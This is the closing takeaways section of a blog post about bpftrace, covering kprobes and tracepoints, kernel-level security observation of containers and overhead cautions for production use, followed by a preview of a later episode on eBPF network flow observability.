bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program
kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions
The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress, because the probe runs on the host in kernel space
Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation
Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, bound every run with a timer (interval:s:N { exit(); }), and watch %si while the probe is attached

What’s Next

bpftrace answers questions you ask in the moment. EP10 covers what happens when you need those answers continuously — not as a one-shot investigation tool, but as persistent telemetry recording every network connection across your entire cluster.

Flow observability from TC hooks is the always-on version: a persistent eBPF program recording every connection attempt, every retransmit, every dropped packet — the ground truth layer that everything above it interprets. When your APM says “timeout” and the kernel says “retransmit storm to one specific endpoint,” the kernel is right.

Next: network flow observability at the kernel level

The post bpftrace — Kernel Answers in One Line appeared first on Linuxcent.